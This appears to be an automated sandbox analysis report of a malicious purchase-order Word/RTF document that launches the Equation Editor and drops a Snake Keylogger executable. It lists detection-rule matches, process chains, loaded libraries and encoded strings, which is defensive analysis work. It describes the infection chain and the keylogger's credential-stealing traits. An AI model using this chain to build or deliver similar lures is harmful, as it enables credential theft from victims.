Source: C:\Users\user\AppData\Roaming\mpoom39002.scr	Code function: 6_2_003FE8D0	6_2_003FE8D0
Source: C:\Users\user\AppData\Roaming\mpoom39002.scr	Code function: 6_2_003F74C8	6_2_003F74C8
Source: C:\Users\user\AppData\Roaming\mpoom39002.scr	Code function: 6_2_003FA538	6_2_003FA538
Source: C:\Users\user\AppData\Roaming\mpoom39002.scr	Code function: 6_2_003FEF20	6_2_003FEF20
Source: C:\Users\user\AppData\Roaming\mpoom39002.scr	Code function: 6_2_003F3D10	6_2_003F3D10
Source: C:\Users\user\AppData\Roaming\mpoom39002.scr	Code function: 6_2_003F2300	6_2_003F2300
Source: C:\Users\user\AppData\Roaming\mpoom39002.scr	Code function: 6_2_003F8B00	6_2_003F8B00
Source: C:\Users\user\AppData\Roaming\mpoom39002.scr	Code function: 6_2_003FF570	6_2_003FF570
Source: C:\Users\user\AppData\Roaming\mpoom39002.scr	Code function: 6_2_003F4168	6_2_003F4168
Source: C:\Users\user\AppData\Roaming\mpoom39002.scr	Code function: 6_2_003F2758	6_2_003F2758
Source: C:\Users\user\AppData\Roaming\mpoom39002.scr	Code function: 6_2_003F8F58	6_2_003F8F58
Source: C:\Users\user\AppData\Roaming\mpoom39002.scr	Code function: 6_2_003FC950	6_2_003FC950
Source: C:\Users\user\AppData\Roaming\mpoom39002.scr	Code function: 6_2_003F0D48	6_2_003F0D48
Source: C:\Users\user\AppData\Roaming\mpoom39002.scr	Code function: 6_2_003FBF48	6_2_003FBF48
Source: C:\Users\user\AppData\Roaming\mpoom39002.scr	Code function: 6_2_003F2BB0	6_2_003F2BB0
Source: C:\Users\user\AppData\Roaming\mpoom39002.scr	Code function: 6_2_003F93B0	6_2_003F93B0
Source: C:\Users\user\AppData\Roaming\mpoom39002.scr	Code function: 6_2_003F11A0	6_2_003F11A0
Source: C:\Users\user\AppData\Roaming\mpoom39002.scr	Code function: 6_2_003FCFA0	6_2_003FCFA0
Source: C:\Users\user\AppData\Roaming\mpoom39002.scr	Code function: 6_2_003FA990	6_2_003FA990
Source: C:\Users\user\AppData\Roaming\mpoom39002.scr	Code function: 6_2_003F15F8	6_2_003F15F8
Source: C:\Users\user\AppData\Roaming\mpoom39002.scr	Code function: 6_2_003FD5F0	6_2_003FD5F0
Source: C:\Users\user\AppData\Roaming\mpoom39002.scr	Code function: 6_2_003FADE8	6_2_003FADE8
Source: C:\Users\user\AppData\Roaming\mpoom39002.scr	Code function: 6_2_003F67D0	6_2_003F67D0
Source: C:\Users\user\AppData\Roaming\mpoom39002.scr	Code function: 6_2_003F45C0	6_2_003F45C0
Source: C:\Users\user\AppData\Roaming\mpoom39002.scr	Code function: 6_2_003FB230	6_2_003FB230
Source: C:\Users\user\AppData\Roaming\mpoom39002.scr	Code function: 6_2_003FDC28	6_2_003FDC28
Source: C:\Users\user\AppData\Roaming\mpoom39002.scr	Code function: 6_2_003F8219	6_2_003F8219
Source: C:\Users\user\AppData\Roaming\mpoom39002.scr	Code function: 6_2_003F4A09	6_2_003F4A09
Source: C:\Users\user\AppData\Roaming\mpoom39002.scr	Code function: 6_2_003F6458	6_2_003F6458
Source: C:\Users\user\AppData\Roaming\mpoom39002.scr	Code function: 6_2_003F3451	6_2_003F3451
Source: C:\Users\user\AppData\Roaming\mpoom39002.scr	Code function: 6_2_003F9C50	6_2_003F9C50
Source: C:\Users\user\AppData\Roaming\mpoom39002.scr	Code function: 6_2_003F644A	6_2_003F644A
Source: C:\Users\user\AppData\Roaming\mpoom39002.scr	Code function: 6_2_003F1A40	6_2_003F1A40
Source: C:\Users\user\AppData\Roaming\mpoom39002.scr	Code function: 6_2_003F38A8	6_2_003F38A8
Source: C:\Users\user\AppData\Roaming\mpoom39002.scr	Code function: 6_2_003F1E98	6_2_003F1E98
Source: C:\Users\user\AppData\Roaming\mpoom39002.scr	Code function: 6_2_003F8698	6_2_003F8698
Source: C:\Users\user\AppData\Roaming\mpoom39002.scr	Code function: 6_2_003F048A	6_2_003F048A
Source: C:\Users\user\AppData\Roaming\mpoom39002.scr	Code function: 6_2_003FB688	6_2_003FB688
Source: C:\Users\user\AppData\Roaming\mpoom39002.scr	Code function: 6_2_003F22F0	6_2_003F22F0
Source: C:\Users\user\AppData\Roaming\mpoom39002.scr	Code function: 6_2_003F8AF0	6_2_003F8AF0
Source: C:\Users\user\AppData\Roaming\mpoom39002.scr	Code function: 6_2_003F08E0	6_2_003F08E0
Source: C:\Users\user\AppData\Roaming\mpoom39002.scr	Code function: 6_2_003F5CD2	6_2_003F5CD2
Source: C:\Users\user\AppData\Roaming\mpoom39002.scr	Code function: 6_2_003FA0D1	6_2_003FA0D1
Source: C:\Users\user\AppData\Roaming\mpoom39002.scr	Code function: 6_2_003F0D38	6_2_003F0D38
Source: C:\Users\user\AppData\Roaming\mpoom39002.scr	Code function: 6_2_003FA52C	6_2_003FA52C
Source: C:\Users\user\AppData\Roaming\mpoom39002.scr	Code function: 6_2_003FEF11	6_2_003FEF11
Source: C:\Users\user\AppData\Roaming\mpoom39002.scr	Code function: 6_2_003F3D0C	6_2_003F3D0C
Source: C:\Users\user\AppData\Roaming\mpoom39002.scr	Code function: 6_2_003F4158	6_2_003F4158
Source: C:\Users\user\AppData\Roaming\mpoom39002.scr	Code function: 6_2_003F8F4C	6_2_003F8F4C
Source: C:\Users\user\AppData\Roaming\mpoom39002.scr	Code function: 6_2_003F2749	6_2_003F2749
Source: C:\Users\user\AppData\Roaming\mpoom39002.scr	Code function: 6_2_003FC940	6_2_003FC940
Source: C:\Users\user\AppData\Roaming\mpoom39002.scr	Code function: 6_2_003F45B0	6_2_003F45B0
Source: C:\Users\user\AppData\Roaming\mpoom39002.scr	Code function: 6_2_003F2BA0	6_2_003F2BA0
Source: C:\Users\user\AppData\Roaming\mpoom39002.scr	Code function: 6_2_003F93A0	6_2_003F93A0
Source: C:\Users\user\AppData\Roaming\mpoom39002.scr	Code function: 6_2_003F1192	6_2_003F1192
Source: C:\Users\user\AppData\Roaming\mpoom39002.scr	Code function: 6_2_003FA980	6_2_003FA980
Source: C:\Users\user\AppData\Roaming\mpoom39002.scr	Code function: 6_2_003F2FF9	6_2_003F2FF9
Source: C:\Users\user\AppData\Roaming\mpoom39002.scr	Code function: 6_2_003F97F9	6_2_003F97F9
Source: C:\Users\user\AppData\Roaming\mpoom39002.scr	Code function: 6_2_003F15EA	6_2_003F15EA
Source: C:\Users\user\AppData\Roaming\mpoom39002.scr	Code function: 6_2_003FADD9	6_2_003FADD9
Source: C:\Users\user\AppData\Roaming\mpoom39002.scr	Code function: 6_2_00590040	6_2_00590040
Source: C:\Users\user\AppData\Roaming\mpoom39002.scr	Code function: 6_2_00590688	6_2_00590688

Source: ATTHACHED SCAN-P.O SPECIFICATIONS.009.24. 001.doc, type: SAMPLE	Matched rule: INDICATOR_RTF_MalVer_Objects author = ditekSHen, description = Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.
Source: 5.2.mpoom39002.scr.5f0000.2.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector
Source: 5.2.mpoom39002.scr.3253190.5.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector
Source: 5.2.mpoom39002.scr.3253190.5.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector
Source: 5.2.mpoom39002.scr.5f0000.2.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector
Source: 6.2.mpoom39002.scr.80000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 6.2.mpoom39002.scr.80000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 6.2.mpoom39002.scr.80000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 6.2.mpoom39002.scr.80000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 5.2.mpoom39002.scr.3304820.6.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 5.2.mpoom39002.scr.3304820.6.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 5.2.mpoom39002.scr.3304820.6.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 5.2.mpoom39002.scr.3304820.6.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 5.2.mpoom39002.scr.32e49f0.7.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 5.2.mpoom39002.scr.32e49f0.7.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 5.2.mpoom39002.scr.32e49f0.7.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 5.2.mpoom39002.scr.32e49f0.7.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 5.2.mpoom39002.scr.3304820.6.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 5.2.mpoom39002.scr.3304820.6.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 5.2.mpoom39002.scr.3304820.6.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 5.2.mpoom39002.scr.3304820.6.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 5.2.mpoom39002.scr.32e49f0.7.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 5.2.mpoom39002.scr.32e49f0.7.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 5.2.mpoom39002.scr.32e49f0.7.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 5.2.mpoom39002.scr.32e49f0.7.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 5.2.mpoom39002.scr.220f0cc.3.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector
Source: 5.2.mpoom39002.scr.221190c.4.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector
Source: 00000005.00000002.346422484.00000000005F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector
Source: 00000006.00000002.610421955.0000000000082000.00000020.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000006.00000002.610421955.0000000000082000.00000020.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 00000005.00000002.346612206.00000000032A4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000005.00000002.346612206.00000000032A4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: Process Memory Space: mpoom39002.scr PID: 3216, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: mpoom39002.scr PID: 3216, type: MEMORYSTR	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: Process Memory Space: mpoom39002.scr PID: 3248, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: mpoom39002.scr PID: 3248, type: MEMORYSTR	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger

Source: mpoom[1].scr.2.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: mpoom39002.scr.2.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 5.2.mpoom39002.scr.5f0000.2.raw.unpack, DarkListView.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 5.2.mpoom39002.scr.3253190.5.raw.unpack, DarkListView.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 5.2.mpoom39002.scr.3304820.6.raw.unpack, --.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 5.2.mpoom39002.scr.3304820.6.raw.unpack, ---.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 5.2.mpoom39002.scr.3304820.6.raw.unpack, ---.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 5.2.mpoom39002.scr.32e49f0.7.raw.unpack, --.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 5.2.mpoom39002.scr.32e49f0.7.raw.unpack, ---.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 5.2.mpoom39002.scr.32e49f0.7.raw.unpack, ---.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: 5.2.mpoom39002.scr.5f0000.2.raw.unpack, DarkComboBox.cs	Base64 encoded string: 'Uwm+UuKGd614I69RzLI93aXq8M4plP4Fl8XGnAA54HkS/0jMOBsYAdDU3ufQvFFjYZJP0JeYZcnDYanLTNfb9IJuC/u1be1KdJkORevGYuzVlkHzJtU9FNAhjxyJAuY/'
Source: 5.2.mpoom39002.scr.3253190.5.raw.unpack, DarkComboBox.cs	Base64 encoded string: 'Uwm+UuKGd614I69RzLI93aXq8M4plP4Fl8XGnAA54HkS/0jMOBsYAdDU3ufQvFFjYZJP0JeYZcnDYanLTNfb9IJuC/u1be1KdJkORevGYuzVlkHzJtU9FNAhjxyJAuY/'
Source: 5.2.mpoom39002.scr.3304820.6.raw.unpack, ---.cs	Base64 encoded string: 'XXfgNbJ4cUyB+UHiB0C7jag8aawkdKKTNcpy851P8fBMaG9eLKQDE8LVCoqZKCl7'
Source: 5.2.mpoom39002.scr.32e49f0.7.raw.unpack, ---.cs	Base64 encoded string: 'XXfgNbJ4cUyB+UHiB0C7jag8aawkdKKTNcpy851P8fBMaG9eLKQDE8LVCoqZKCl7'

Source: classification engine

Classification label: mal100.troj.spyw.expl.evad.winDOC@7/10@3/2

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\Desktop\~$THACHED SCAN-P.O SPECIFICATIONS.009.24. 001.doc

Jump to behavior

Source: C:\Users\user\AppData\Roaming\mpoom39002.scr

Mutant created: NULL

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Temp\CVR63D1.tmp

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mpoom39002.scr	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mpoom39002.scr	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: ATTHACHED SCAN-P.O SPECIFICATIONS.009.24. 001.doc

ReversingLabs: Detection: 42%

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\user\AppData\Roaming\mpoom39002.scr "C:\Users\user\AppData\Roaming\mpoom39002.scr"
Source: C:\Users\user\AppData\Roaming\mpoom39002.scr	Process created: C:\Users\user\AppData\Roaming\mpoom39002.scr "C:\Users\user\AppData\Roaming\mpoom39002.scr"
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\user\AppData\Roaming\mpoom39002.scr "C:\Users\user\AppData\Roaming\mpoom39002.scr"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mpoom39002.scr	Process created: C:\Users\user\AppData\Roaming\mpoom39002.scr "C:\Users\user\AppData\Roaming\mpoom39002.scr"	Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: wow64win.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: wow64cpu.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: msi.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: rpcrtremote.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: version.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: secur32.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: webio.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: credssp.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: bcrypt.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mpoom39002.scr	Section loaded: wow64win.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mpoom39002.scr	Section loaded: wow64cpu.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mpoom39002.scr	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mpoom39002.scr	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mpoom39002.scr	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mpoom39002.scr	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mpoom39002.scr	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mpoom39002.scr	Section loaded: bcrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mpoom39002.scr	Section loaded: rpcrtremote.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mpoom39002.scr	Section loaded: wow64win.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mpoom39002.scr	Section loaded: wow64cpu.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mpoom39002.scr	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mpoom39002.scr	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mpoom39002.scr	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mpoom39002.scr	Section loaded: bcrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mpoom39002.scr	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mpoom39002.scr	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mpoom39002.scr	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mpoom39002.scr	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mpoom39002.scr	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mpoom39002.scr	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mpoom39002.scr	Section loaded: credssp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mpoom39002.scr	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mpoom39002.scr	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mpoom39002.scr	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mpoom39002.scr	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mpoom39002.scr	Section loaded: rpcrtremote.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mpoom39002.scr	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mpoom39002.scr	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: wow64win.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: wow64cpu.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: msi.dll	Jump to behavior
